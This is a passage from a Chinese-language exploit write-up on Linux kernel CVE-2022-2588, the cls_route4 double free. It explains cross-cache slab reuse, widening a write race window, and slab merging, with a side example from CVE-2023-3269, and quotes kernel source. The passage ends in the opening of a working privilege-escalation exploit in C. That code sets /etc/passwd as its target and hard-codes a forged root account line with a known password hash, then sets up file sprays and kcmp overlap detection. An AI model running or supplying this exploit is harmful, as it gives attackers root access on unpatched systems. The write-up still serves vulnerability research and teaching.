 * its bucket chain, queue it for deferred freeing, and release the
 * bucket/report "last" when the table becomes empty.
 *
 * In the CVE-2022-2588 scenario a handle-0 filter that route4_change
 * already freed is still linked here, so this path queues a second
 * route4_delete_filter_work on it — the double free. */
static int route4_delete(struct tcf_proto *tp, void *arg, bool *last,
bool rtnl_held, struct netlink_ext_ack *extack)
{
struct route4_head *head = rtnl_dereference(tp->root);
struct route4_filter *f = arg;
struct route4_filter __rcu **fp;
struct route4_filter *nf;
struct route4_bucket *b;
unsigned int h = 0;
int i, h1;

if (!head || !f)
return -EINVAL;

h = f->handle;
b = f->bkt;

fp = &b->ht[from_hash(h >> 16)];
for (nf = rtnl_dereference(*fp); nf;
fp = &nf->next, nf = rtnl_dereference(*fp)) {
if (nf == f) {
/* unlink it */
RCU_INIT_POINTER(*fp, rtnl_dereference(f->next));

/* Remove any fastmap lookups that might ref filter
 * notice we unlink'd the filter so we can't get it
 * back in the fastmap.
 */
route4_reset_fastmap(head);

/* Delete it */
tcf_unbind_filter(tp, &f->res);
tcf_exts_get_net(&f->exts);
tcf_queue_work(&f->rwork, route4_delete_filter_work);

/* Strip RTNL protected tree */
for (i = 0; i <= 32; i++) {
struct route4_filter *rt;

rt = rtnl_dereference(b->ht[i]);
if (rt)
goto out;
}

/* OK, session has no flows */
RCU_INIT_POINTER(head->table[to_hash(h)], NULL);
kfree_rcu(b, rcu);
break;
}
}

out:
/* Report whether the whole table is now empty so the caller can
 * tear down the tcf_proto. */
*last = true;
for (h1 = 0; h1 <= 256; h1++) {
if (rcu_access_pointer(head->table[h1])) {
*last = false;
break;
}
}

return 0;
}

这里再次关注ops中的route4_delete函数,这个函数的作用是释放所有的过滤器,这里使用的依旧是route4_delete_filter_work函数进行删除的,由于前面提到的route4_head中仍然残存handle为0的过滤器的哈希值,因此会对route4_filterroute4_filter->exts->actions对象存在double free

漏洞利用

(这里的利用机制我没有在文章中提过,但等我看完了发现我以前在适配CVE-2023-3269的时候学过T_T,属于是白忙活一场了)

既然以前的文章中没提到这里就详细介绍一下,既然这篇文章介绍了那就不再写今年那个CVE的分析文章了。

cross-cache

在前面提到,这一利用手法是用于解决内核内部隔离存在的,在CVE-2023-3269的这篇文章中则是用于绕过NUMA机制使用的,只不过在StackRot利用条件更为苛刻,在把这一手法讲解完毕之后简单提一下。

在前面的一篇文章中详细的解释了内核中的内部隔离机制,大家应该也已经知道了GFP_KERNEL_ACCOUNT标识位和GFP_KERNEL标识位去申请object的时候会从不同的cache中去取。

说到本篇文章,我们前面提到的可以对两个对象进行Double free,其分别是route4_filterroute4_filter->exts->actions,这里主要关注他们的大小,其分别是144和256,会从不同的cache中去取,分别是kmalloc-192kmalloc-256。而在内核的默认配置中file结构体的大小正好为256,自然而然可以联想到,如果首先使用一个可写的文件占据此位置,再释放掉再使用我们目标的文件去占取再通过某些手法是否可以达成类似于dirty pipe一样的效果呢?

这里先不考虑后续写的手法,从开始用file结构体开始考虑就会发现内核在分配file结构体时会从一个专属的缓存中取出(类似于cred结构体的分配),所以这时就不得不考虑cross_cache了。

众所周知,在内核中管理内存方式主要是两种一是slub用于分配较小的object,其次是buddy system机制用于分配页面。当某一个slab page被释放时会被buddy system回收,在后续的某个时间可能会被重用,然而重用就可能导致不同的cache从同一个页中取出了用一个位置的object交由其他内容使用。而cross-cache利用方法则是利用上述这一机制进行的,当某一slab page中的所有内存槽被释放,那么这个slab page会被强制释放给buddy system,此时如果堆喷另一种类型的对象且其对应的缓存耗尽则会向buddy system申请新的内存页,如果恰好使用了我们前面恶意强制释放的slab page则可实现攻击。(此处的重用机制在下文有详解,为什么不在这写是因为下面分析CVE是我临时起意的)

将此方法运用到这一环境中很容易可以想到首先通过大量堆喷basic_filter结构体完成内存布局,随后分配一个route4_filter结构体随后继续堆喷basic_filter结构体,那么此时就很有可能一个页面中只存在basic_filter->exts->actionsroute4_filter->exts->actions,如果控制将这个页面中的结构体对应basic_filterroute4_filter全部释放掉那么这个页面则会被强制释放进入buddy system中。再堆喷大量的正常文件使其成功占领我的UAF object,至此我们仍不知道到底是什么位置或是那个文件描述符占据了我们目标位置,所以这里使用漏洞产生double free再一次堆喷大量正常文件来占据刚刚的空洞,随后通过kcmp系统调用即可找到我们共享文件描述符的位置了。

延长时间窗口

前面只提到了可以找到共享文件描述符的位置了,没有继续往后写了,因为这里会遇到一个新的问题了,这里先讲后续的步骤写出来。

首先,我们已经拿到了目标文件描述符,并且是两个,那我们可以依照常识进行尝试就是我们对其中一个文件描述符中进行写入,对另一个文件描述符写入恶意字符,此时再将两个文件描述符都关闭( 因为都在使用所以此处的引用计数器为2 ),此时再大量堆喷去打开目标特权文件,有一定的几率让特权文件的file结构体会覆盖掉原本的空洞,从而导致后面的恶意字符写入到了特权文件中去了。

通过前面简要的说明可以看出来这里是存在一个条件竞争的关系,需要在第一个写入垃圾字符,第二个写入恶意字符还没写入时完成偷梁换柱的戏码,看过上一篇文章的朋友可能就会想到使用fuse即可实现,虽然从理论上讲是可以的,但其最终都会利用到内核实现的write的机制。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
/* VFS write entry point. Validates that the file is writable and the
 * user buffer is accessible, takes the superblock write protection
 * (file_start_write), dispatches to the file's write/write_iter op,
 * and emits fsnotify/accounting on success.
 *
 * The exploit relies on the window between the permission checks at
 * the top and the actual f_op->write call: a blocked writer has
 * already passed FMODE_WRITE validation against the old file. */
ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
ssize_t ret;

if (!(file->f_mode & FMODE_WRITE))
return -EBADF;
if (!(file->f_mode & FMODE_CAN_WRITE))
return -EINVAL;
if (unlikely(!access_ok(buf, count)))
return -EFAULT;

ret = rw_verify_area(WRITE, file, pos, count);
if (ret)
return ret;
if (count > MAX_RW_COUNT)
count = MAX_RW_COUNT;
file_start_write(file);
if (file->f_op->write)
ret = file->f_op->write(file, buf, count, pos);
else if (file->f_op->write_iter)
ret = new_sync_write(file, buf, count, pos);
else
ret = -EINVAL;
if (ret > 0) {
fsnotify_modify(file);
add_wchar(current, ret);
}
inc_syscw(current);
file_end_write(file);
return ret;
}

在经过几层调用,write会进入到上述函数中,可以看到在函数的开头部分会检查该文件是否可以写入随后执行file_start_write然后调用ops中的write最后执行file_end_write

1
2
3
4
5
6
7
8
9
10
11
12
13
/* Enter the superblock write-protection section for a regular file
 * (no-op for non-regular files). May block, e.g. while the fs is
 * frozen — this is the blocking point the exploit uses to widen the
 * race window. */
static inline void file_start_write(struct file *file)
{
if (!S_ISREG(file_inode(file)->i_mode))
return;
sb_start_write(file_inode(file)->i_sb);
}

/* Leave the superblock write-protection section taken by
 * file_start_write (no-op for non-regular files). */
static inline void file_end_write(struct file *file)
{
if (!S_ISREG(file_inode(file)->i_mode))
return;
__sb_end_write(file_inode(file)->i_sb, SB_FREEZE_WRITE);
}

其实这个file_start_writefile_end_write很容易猜出来其功能是什么,这里就是给write加上一个inode锁,当进程A在往程序中写入时进程B会被阻塞在file_start_write的位置,那也就意味着进程B已经通过了程序是否可写的验证了,只是等待进程A写完就会开始写入了,所以在此期间实现上面的偷梁换柱即可,而延长窗口时间的办法就是进程A写入大量数据使进程B阻塞时间延长。

篇外CVE-2023-3269

(与本文无瓜,这里主要举个cross-cache的🌰,仔细看了一下感觉这个考虑的问题比此篇文章考虑的要多一点)

这个漏洞就不展开讲述了,其是一个UAF漏洞,在cpu0访问vma时cpu1触发expand_stack时有一定几率会因为expand_stack释放掉对应的maple node,而另外一边则还在试图访问vma,当然是可以通过某种方式延长窗口时间,这里不过多提到。

所以如果我们想要实现任意地址读则需要用可控的结构体去占领比如msg_msg,可惜的是我们单纯堆喷msg_msg是无法在内存中申请到对应的位置的。

此漏洞的攻击方式从两个方向考虑的,第一就是开启了CONFIG_SLAB_MERGE_DEFAULT选项时(该选项默认开启),意味着打开了slab重用机制,这里简单介绍一下slab重用机制。

向pipe_buffer说yes!篇文章中详细描述了一个slab的申请过程但并没有讨论重用slab的选项,这里首先提一下重用的条件,在后续的代码中可以一一得到验证便于理解

  • 对方的slab cache和自己的flag都不开启SLAB_NEVER_MERGE

  • 对方的slab cache和自己都没有构造函数

  • 对方的slab cache和自己的usersize都为0

  • 对方的slab大小和自己的相同

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
/* Create a slab cache with an optional usercopy (hardened-usercopy)
 * region. When usersize == 0 it first tries __kmem_cache_alias() to
 * merge with an existing compatible cache (slab merging); only if no
 * alias is found does it create a fresh cache. */
struct kmem_cache *
kmem_cache_create_usercopy(const char *name,
unsigned int size, unsigned int align,
slab_flags_t flags,
unsigned int useroffset, unsigned int usersize,
void (*ctor)(void *))
{
struct kmem_cache *s = NULL;
const char *cache_name;
int err;

#ifdef CONFIG_SLUB_DEBUG
/*
 * If no slub_debug was enabled globally, the static key is not yet
 * enabled by setup_slub_debug(). Enable it if the cache is being
 * created with any of the debugging flags passed explicitly.
 */
if (flags & SLAB_DEBUG_FLAGS)
static_branch_enable(&slub_debug_enabled);
#endif

mutex_lock(&slab_mutex);

err = kmem_cache_sanity_check(name, size);
if (err) {
goto out_unlock;
}

/* Refuse requests with allocator specific flags */
if (flags & ~SLAB_FLAGS_PERMITTED) {
err = -EINVAL;
goto out_unlock;
}

/*
 * Some allocators will constraint the set of valid flags to a subset
 * of all flags. We expect them to define CACHE_CREATE_MASK in this
 * case, and we'll just provide them with a sanitized version of the
 * passed flags.
 */
flags &= CACHE_CREATE_MASK;

/* Fail closed on bad usersize of useroffset values. */
if (WARN_ON(!usersize && useroffset) ||
WARN_ON(size < usersize || size - usersize < useroffset))
usersize = useroffset = 0;

/* Merge path: only caches with no usercopy region are mergeable. */
if (!usersize)
s = __kmem_cache_alias(name, size, align, flags, ctor);
if (s)
goto out_unlock;

cache_name = kstrdup_const(name, GFP_KERNEL);
if (!cache_name) {
err = -ENOMEM;
goto out_unlock;
}

s = create_cache(cache_name, size,
calculate_alignment(flags, align, size),
flags, useroffset, usersize, ctor, NULL);
if (IS_ERR(s)) {
err = PTR_ERR(s);
kfree_const(cache_name);
}

out_unlock:
mutex_unlock(&slab_mutex);

if (err) {
if (flags & SLAB_PANIC)
panic("%s: Failed to create slab '%s'. Error %d\n",
__func__, name, err);
else {
pr_warn("%s(%s) failed with error %d\n",
__func__, name, err);
dump_stack();
}
return NULL;
}
return s;
}
EXPORT_SYMBOL(kmem_cache_create_usercopy);

在代码中会验证usersize是否为0,如果是则调用__kmem_cache_alias寻找可重用的slab如果找到了则直接退出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/* SLUB cache-merging: find an existing compatible cache via
 * find_mergeable() and, if found, bump its refcount, widen its object
 * size to cover the new request, and register a sysfs alias. Returns
 * the merged cache or NULL if no merge candidate exists. */
struct kmem_cache *
__kmem_cache_alias(const char *name, unsigned int size, unsigned int align,
slab_flags_t flags, void (*ctor)(void *))
{
struct kmem_cache *s;

s = find_mergeable(size, align, flags, name, ctor);
if (s) {
s->refcount++;

/*
 * Adjust the object sizes so that we clear
 * the complete object on kzalloc.
 */
s->object_size = max(s->object_size, size);
s->inuse = max(s->inuse, ALIGN(size, sizeof(void *)));

if (sysfs_slab_alias(s, name)) {
/* Alias registration failed: undo the merge. */
s->refcount--;
s = NULL;
}
}

return s;
}

继续跟进函数,可以发现其内部其实就是调用了一个find_mergeable去寻找slab

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
/* Search slab_caches for an existing cache the new (size, align, flags,
 * ctor) request can merge into. Merging is refused globally by
 * slab_nomerge, per-request by a ctor or SLAB_NEVER_MERGE, and
 * per-candidate by slab_unmergeable() plus size/alignment/flag
 * compatibility checks. Returns the first compatible cache or NULL. */
struct kmem_cache *find_mergeable(unsigned int size, unsigned int align,
slab_flags_t flags, const char *name, void (*ctor)(void *))
{
struct kmem_cache *s;

if (slab_nomerge)
return NULL;

/* A constructor makes object reuse unsafe across types. */
if (ctor)
return NULL;

size = ALIGN(size, sizeof(void *));
align = calculate_alignment(flags, align, size);
size = ALIGN(size, align);
flags = kmem_cache_flags(size, flags, name);

if (flags & SLAB_NEVER_MERGE)
return NULL;

list_for_each_entry_reverse(s, &slab_caches, list) {
if (slab_unmergeable(s))
continue;

if (size > s->size)
continue;

if ((flags & SLAB_MERGE_SAME) != (s->flags & SLAB_MERGE_SAME))
continue;
/*
 * Check if alignment is compatible.
 * Courtesy of Adrian Drzewiecki
 */
if ((s->size & ~(align - 1)) != s->size)
continue;

/* Reject candidates that would waste a pointer's worth
 * of space per object. */
if (s->size - size >= sizeof(void *))
continue;

if (IS_ENABLED(CONFIG_SLAB) && align &&
(align > s->align || s->align % align))
continue;

return s;
}
return NULL;
}

而在函数内部则会校验前面提到的flags中不存在SLAB_NEVER_MERGE,随后遍历slab_caches全局链表使用slab_unmergeable函数查看是否可以重用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/* Global merge switch: merging is on by default only when
 * CONFIG_SLAB_MERGE_DEFAULT is enabled. */
static bool slab_nomerge = !IS_ENABLED(CONFIG_SLAB_MERGE_DEFAULT);

/* Returns nonzero if cache s must not be merged with others:
 * merging disabled, SLAB_NEVER_MERGE flagged, has a constructor,
 * has a usercopy region, or is being torn down (refcount < 0). */
int slab_unmergeable(struct kmem_cache *s)
{
if (slab_nomerge || (s->flags & SLAB_NEVER_MERGE))
return 1;

if (s->ctor)
return 1;

if (s->usersize)
return 1;

/*
 * We may have set a slab to be unmergeable during bootstrap.
 */
if (s->refcount < 0)
return 1;

return 0;
}

该函数会依次验证是否开启CONFIG_SLAB_MERGE_DEFAULT选项,flags标志位是否存在SLAB_NERVER_MERGE,是否存在构造函数,usersize是否为0,最后是引用次数小于0表示该slab准备释放无法重用。

以上就是slab重用的基本机制,从而可以得出,如果在开启了CONFIG_SLAB_MERGE_DEFAULT内核选项时存在UAFmaple node所在的slab是会进入到重用链表中取得,而后可以使用msg_msg结构体堆喷相同大小从而分配到UAFmaple node上去的。但是原文重点讲述了在没有开启CONFIG_SLAB_MERGE_DEFAULT选项时如何解决。

首先现在的很多计算机采用的是NUMA架构,意味着对于每个CPU来说存在两条链表来存放被释放的slab:首先是cpu_slab,其次是NODE的partial list。又因为没有开启CONFIG_SLAB_MERGE_DEFAULT选项的关系,被释放的slab是无法被重用申请到的,所以这里需要将slab UAF转化为page UAF

原文在这里使用的方式是通过clone/fork大量进程来申请大量相同的vma树,然后让一个slab中的所有内容都为我们的maple node,此时可以释放掉每个slab的多余的内容只留下一个object,最后触发漏洞,使其也被释放掉。因为一整个slab上的所有对象都被释放掉了,也就意味着此slab会被强制释放,随后会进入cpu_slab,如果我们前面申请的大量相同进程导致其满了则会进入nodepartial list如果也满了则会进入销毁slab的流程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
/* SLUB slow-path free (snippet — the fast-path/cmpxchg portion is
 * elided below). The parts shown decide the fate of the slab page:
 * if the page becomes fully free and the node already holds at least
 * min_partial partial slabs, the page is discarded back to the buddy
 * allocator (discard_slab) — the mechanism cross-cache attacks rely
 * on to recycle a slab page under a different object type. */
static void __slab_free(struct kmem_cache *s, struct page *page,
void *head, void *tail, int cnt,
unsigned long addr)

{
void *prior;
int was_frozen;
struct page new;
unsigned long counters;
struct kmem_cache_node *n = NULL;
unsigned long flags;

// ... ...

/* Fully free page + node partial list already full -> discard. */
if (unlikely(!new.inuse && n->nr_partial >= s->min_partial))
goto slab_empty;

/*
 * Objects left in the slab. If it was not on the partial list before
 * then add it.
 */
if (!kmem_cache_has_cpu_partial(s) && unlikely(!prior)) {
remove_full(s, n, page);
add_partial(n, page, DEACTIVATE_TO_TAIL);
stat(s, FREE_ADD_PARTIAL);
}
spin_unlock_irqrestore(&n->list_lock, flags);
return;

slab_empty:
if (prior) {
/*
 * Slab on the partial list.
 */
remove_partial(n, page);
stat(s, FREE_REMOVE_PARTIAL);
} else {
/* Slab must be on the full list */
remove_full(s, n, page);
}

spin_unlock_irqrestore(&n->list_lock, flags);
stat(s, FREE_SLAB);
discard_slab(s, page);
}

可以看到这里会验证数量是否满了,如果满了则会进入销毁流程调用discard_slab

1
2
3
4
5
/* Kernel quote (mm/slub.c): drop per-node slab accounting, then hand the
 * backing page back via free_slab(). */
static void discard_slab(struct kmem_cache *s, struct page *page)
{
dec_slabs_node(s, page_to_nid(page), page->objects);
free_slab(s, page);
}

discard_slab函数首先做的事是修改一些数据上的内容随后接着调用free_slab

1
2
3
4
5
6
7
/* Kernel quote (mm/slub.c): defer the page free through RCU for
 * SLAB_TYPESAFE_BY_RCU caches, otherwise free it immediately. */
static void free_slab(struct kmem_cache *s, struct page *page)
{
if (unlikely(s->flags & SLAB_TYPESAFE_BY_RCU)) {
call_rcu(&page->rcu_head, rcu_free_slab);
} else
__free_slab(s, page);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/*
 * Kernel quote (mm/slub.c): strip the slab identity off the compound page
 * and return it to the buddy allocator.  Once __free_pages() runs, the
 * page can be reclaimed by anyone (e.g. an msg_msg spray) — this is what
 * turns the slab UAF into a page UAF.
 */
static void __free_slab(struct kmem_cache *s, struct page *page)
{
int order = compound_order(page);
int pages = 1 << order;

if (kmem_cache_debug_flags(s, SLAB_CONSISTENCY_CHECKS)) {
void *p;

slab_pad_check(s, page);
for_each_object(p, s, page_address(page),
page->objects)
check_object(s, page, p, SLUB_RED_INACTIVE);
}

__ClearPageSlabPfmemalloc(page);
__ClearPageSlab(page);
/* In union with page->mapping where page allocator expects NULL */
page->slab_cache = NULL;
if (current->reclaim_state)
current->reclaim_state->reclaimed_slab += pages;
unaccount_slab_page(page, order, s);
__free_pages(page, order);
}

这里做的事就是获得page的order,清空page->slab_cache指针,最后释放对应的page。当page被释放后就好办了,可以大量堆喷msg_msg,使其从buddy system申请page即可。

综上,可得exp

可以预见的是,这一利用方法是不需要依赖任何地址的,但是这里想要跑通exp需要修改一下config文件

1
2
3
4
CONFIG_NET_CLS_ROUTE4=y
CONFIG_DUMMY=y
CONFIG_NET_SCH_QFQ=y
CONFIG_NET_CLS_BASIC=y

(有点不想写exp了,如果没删这句话那下面exp就是原文的,如果删了就是自己写的好像删了你们也看不到)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
#define _GNU_SOURCE

#include <arpa/inet.h>
#include <assert.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mount.h>
#include <sys/msg.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/timerfd.h>

#include <linux/tc_ematch/tc_em_meta.h>
#include <sys/resource.h>

#include <linux/capability.h>
#include <linux/futex.h>
#include <linux/genetlink.h>
#include <linux/if_addr.h>
#include <linux/if_ether.h>
#include <linux/if_link.h>
#include <linux/if_tun.h>
#include <linux/in6.h>
#include <linux/ip.h>
#include <linux/kcmp.h>
#include <linux/neighbour.h>
#include <linux/net.h>
#include <linux/netlink.h>
#include <linux/pkt_cls.h>
#include <linux/pkt_sched.h>
#include <linux/rtnetlink.h>
#include <linux/tcp.h>
#include <linux/veth.h>

#include <x86intrin.h>

#include <err.h>
#include <fcntl.h>
#include <poll.h>
#include <pthread.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/utsname.h>
#include <unistd.h>

// #define DEBUG

/* File to hijack and the forged root account line ("user" with a known
 * password hash) that gets written over its head. */
char *target = "/etc/passwd";
char *overwrite =
"user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:root:/root:/bin/bash\n";
/* MAP_SHARED scratch page set up in main(); shared with forked children. */
char *global;
char *self_path;
char *content;

#define PAGE_SIZE 0x1000
#define MAX_FILE_NUM 0x8000

/* fds of the two file-spray waves used to detect the struct-file overlap. */
int fds[MAX_FILE_NUM] = {};
int fd_2[MAX_FILE_NUM] = {};
/* The pair of descriptors found (via kcmp) to share one struct file. */
int overlap_a = -1;
int overlap_b = -1;

int cpu_cores = 0;
int sockfd = -1;

/* Spray sizes; lowered by adjust_rlimit() when RLIMIT_NOFILE is capped. */
int spray_num_1 = 2000;
int spray_num_2 = 4000;

// int spray_num_1 = 4000;
// int spray_num_2 = 5000;

/* Pipes that sequence the cooperating processes. */
int pipe_main[2];
int pipe_parent[2];
int pipe_child[2];
int pipe_defrag[2];
int pipe_file_spray[2][2];

/* Flags shared between the slow_write/write_cmd racing threads.
 * NOTE(review): plain ints accessed from two threads — relies on the
 * platform's visibility semantics; atomics would be stricter. */
int run_write = 0;
int run_spray = 0;
char *passwd;
bool overlapped = false;

/*
 * Debug helper: print `size` bytes at `data` as a classic 16-bytes-per-row
 * hex + ASCII dump.  Compiles to a no-op unless DEBUG is defined.
 */
void DumpHex(const void *data, size_t size)
{
#ifdef DEBUG
    char ascii[17];
    size_t i, j;
    ascii[16] = '\0';
    for (i = 0; i < size; ++i)
    {
        printf("%02X ", ((unsigned char *)data)[i]);
        /* Printable bytes show as themselves, everything else as '.'. */
        if (((unsigned char *)data)[i] >= ' ' &&
            ((unsigned char *)data)[i] <= '~')
        {
            ascii[i % 16] = ((unsigned char *)data)[i];
        }
        else
        {
            ascii[i % 16] = '.';
        }
        if ((i + 1) % 8 == 0 || i + 1 == size)
        {
            printf(" ");
            if ((i + 1) % 16 == 0)
            {
                printf("| %s \n", ascii);
            }
            else if (i + 1 == size)
            {
                /* Pad the final, partial row so the ASCII column lines up. */
                ascii[(i + 1) % 16] = '\0';
                if ((i + 1) % 16 <= 8)
                {
                    printf(" ");
                }
                for (j = (i + 1) % 16; j < 16; ++j)
                {
                    printf("   ");
                }
                printf("| %s \n", ascii);
            }
        }
    }
#else
    /* Release build: silence unused-parameter warnings. */
    (void)data;
    (void)size;
#endif
}

/*
 * Restrict the calling thread to a single CPU.  Terminates the whole
 * process if sched_setaffinity() fails.
 */
void pin_on_cpu(int cpu)
{
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(cpu, &mask);

    if (sched_setaffinity(0, sizeof(mask), &mask))
    {
        perror("sched_setaffinity()");
        exit(EXIT_FAILURE);
    }
}

/*
 * printf-style helper: format `what` with the trailing varargs and write
 * the result to `file`.  Returns true on success; on a short/failed write
 * the fd is closed with errno preserved and false is returned.
 */
static bool write_file(const char *file, const char *what, ...)
{
    char buf[1024];
    va_list ap;

    va_start(ap, what);
    vsnprintf(buf, sizeof(buf), what, ap);
    va_end(ap);
    buf[sizeof(buf) - 1] = 0;

    int len = strlen(buf);
    int fd = open(file, O_WRONLY | O_CLOEXEC);
    if (fd == -1)
        return false;

    if (write(fd, buf, len) != len)
    {
        int saved_errno = errno;
        close(fd);
        errno = saved_errno;
        return false;
    }

    close(fd);
    return true;
}

/*
 * Create and enter a scratch directory "exp_dir" containing two data files
 * and a "uaf" symlink to ./data (the file whose struct file is later
 * double-freed and reclaimed).  Exits the process on chmod/chdir failure.
 */
static void use_temporary_dir(void)
{
    /* Best effort; chmod/chdir below catch a failed mkdir. */
    system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
    system("touch exp_dir/data2");
    const char *tmpdir = "exp_dir";
    /* (removed the original's dead `if (!tmpdir)` check: a string literal
     * is never NULL) */
    if (chmod(tmpdir, 0777))
        exit(1);
    if (chdir(tmpdir))
        exit(1);
    symlink("./data", "./uaf");
}

/* Best-effort mount of the fusectl filesystem; any failure is ignored. */
static void setup_common()
{
    int rc = mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0);
    (void)rc; /* deliberately ignored */
}

/*
 * Clamp resource limits the exploit depends on and raise RLIMIT_NOFILE as
 * high as possible for the file sprays.  If 14096 fds are not permitted,
 * falls back to 4096 and shrinks the global spray sizes to match.
 * All setrlimit() calls except the NOFILE ones are best-effort.
 */
static void adjust_rlimit()
{
struct rlimit rlim;
rlim.rlim_cur = rlim.rlim_max = (200 << 20);
setrlimit(RLIMIT_AS, &rlim);
rlim.rlim_cur = rlim.rlim_max = 32 << 20;
setrlimit(RLIMIT_MEMLOCK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 136 << 20;
// setrlimit(RLIMIT_FSIZE, &rlim);
rlim.rlim_cur = rlim.rlim_max = 1 << 20;
setrlimit(RLIMIT_STACK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 0;
setrlimit(RLIMIT_CORE, &rlim);
// RLIMIT_FILE
rlim.rlim_cur = rlim.rlim_max = 14096;
if (setrlimit(RLIMIT_NOFILE, &rlim) < 0)
{
